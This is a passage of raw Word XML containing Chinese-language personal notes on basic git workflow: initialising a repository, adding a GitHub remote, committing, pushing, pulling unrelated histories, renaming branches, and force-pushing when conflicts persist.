      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我执行过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git init &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，没法执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面不要跟参数当名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731D796" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc159779501"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上创建一个仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="5E286357" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建个空的仓库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77F63E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc159779502"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加远程仓库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="6B2E891B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git remote add origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://github.com/ios-zhouyu/VueDemo.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EAFD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc159779503"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并到本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="5C9263A2" w14:textId="66CEA0F3" w:rsidR="008B1917" w:rsidRPr="008B1917" w:rsidRDefault="008B1917" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git config --global user.name "xxxx" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560E4FA" w14:textId="779AED61" w:rsidR="008B1917" w:rsidRDefault="008B1917" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git config --global user.email </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="0048593F">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>xxxxx@qq.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="735BC2AF" w14:textId="77777777" w:rsidR="008B1917" w:rsidRDefault="008B1917" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EEF0C4" w14:textId="69962B5D" w:rsidR="008B1917" w:rsidRPr="008B1917" w:rsidRDefault="008B1917" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B1917">
        <w:t>git init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21583D35" w14:textId="4BB370D0" w:rsidR="008B1917" w:rsidRDefault="00C50253" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C50253">
        <w:t>git add .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A573A03" w14:textId="3EF43599" w:rsidR="00C50253" w:rsidRDefault="00C50253" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C50253">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git commit - m "</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50253">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50253">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3FFEA" w14:textId="0D824DAA" w:rsidR="008B1917" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00535CFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git remote add origin https://github.com/vofill/test.git(</w:t>
      </w:r>
      <w:r w:rsidRPr="00535CFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidRPr="00535CFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00535CFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后会有一个地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00535CFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCED67" w14:textId="6DC6B40D" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00535CFC">
        <w:t>git push origin master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F2951" w14:textId="77777777" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5369A232" w14:textId="082FF0ED" w:rsidR="00535CFC" w:rsidRPr="008B1917" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果有冲突就尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBCB0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git pull origin master:master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06567C0F" w14:textId="77777777" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B4B6EB" w14:textId="5CD7664E" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决不了冲突就强制推送：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C8E1E" w14:textId="06D67ECF" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00535CFC">
        <w:t>git push origin master --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E0860C" w14:textId="77777777" w:rsidR="00535CFC" w:rsidRDefault="00535CFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B69A1BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc159779504"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提交本地分支到远程分支</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="5E6EBEB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push -u origin master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996E092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc159779505"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将现有项目添加并提交上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="0C32316F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git add -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F347B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git add .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>是提交当前路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git add -A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>是提交整个文件夹子文件夹路径）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD45A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git commit -m '</w:t>
      </w:r>
      <w:r>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54D72D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git push --set-upstream origin master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D82EC" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47762223" w14:textId="25673CA5" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现有仓库提交到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424EF64C" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D"/>
    <w:p w14:paraId="730FEB81" w14:textId="29D22645" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>纯新建项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA13CA" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D"/>
    <w:p w14:paraId="1699B3FA" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>echo "# licenseGenerator" &gt;&gt; README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A3139" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F2269" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git add README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7F3A7" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git commit -m "first commit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B41E2" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git branch -M master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB4A61" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git remote add origin https://github.com/SenRanja/licenseGenerator.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C0493" w14:textId="3A912575" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:t>git push -u origin master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDE777" w14:textId="77777777" w:rsidR="0026132D" w:rsidRPr="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D"/>
    <w:p w14:paraId="2EEF2769" w14:textId="2205A2B3" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已存在项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6618A458" w14:textId="7BBD7AF8" w:rsidR="00BF71EB" w:rsidRDefault="00BF71EB" w:rsidP="00BF71EB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先做的：如果你手贱，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建项目的时候，新建了什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>readme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有的没的的东西，本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前，得先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一下</w:t>
      </w:r>
      <w:r w:rsidR="00A86485">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF5503" w14:textId="46A18C9A" w:rsidR="00A86485" w:rsidRPr="00A86485" w:rsidRDefault="00A86485" w:rsidP="00BF71EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86485">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git pull github master --allow-unrelated-histories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B9C4FA" w14:textId="1DA9E6FC" w:rsidR="00BF71EB" w:rsidRDefault="00A86485" w:rsidP="00BF71EB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程分支，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">–allow-unreleated-histories </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比如你手贱新建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候会拒绝，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建项目弄的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有第一次的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和你本地历史对不上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>merge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认不允许，所以你得手动指定）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711132D1" w14:textId="77777777" w:rsidR="00BF71EB" w:rsidRPr="00BF71EB" w:rsidRDefault="00BF71EB" w:rsidP="00BF71EB"/>
    <w:p w14:paraId="16654EB7" w14:textId="298F8F17" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，如果本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经有项目了，应该是推送此处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F064F1B" w14:textId="077D6226" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>evo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统，在本地已经推送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认的远程地址名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须重命名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AA502F" w14:textId="478972CF" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git remote add origin https://github.com/SenRanja/licenseGenerator.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2EC72" w14:textId="77777777" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git branch -M master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F649E3D" w14:textId="45874BF0" w:rsidR="00153748" w:rsidRDefault="00153748" w:rsidP="0026132D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git branch -M </w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令用于重命名当前分支。具体来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-M </w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git </w:t>
      </w:r>
      <w:r w:rsidRPr="00153748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制重命名分支，即使新的分支名与已存在的分支名冲突也会强制执行。这个命令的常见用途是将当前分支重命名为一个新的分支名。</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33018F37" w14:textId="3AC5B54B" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="0026132D" w:rsidP="0026132D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push -u origin master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C19C7F" w14:textId="2C66C9E1" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C708049" w14:textId="62F661A9" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改</w:t>
      </w:r>
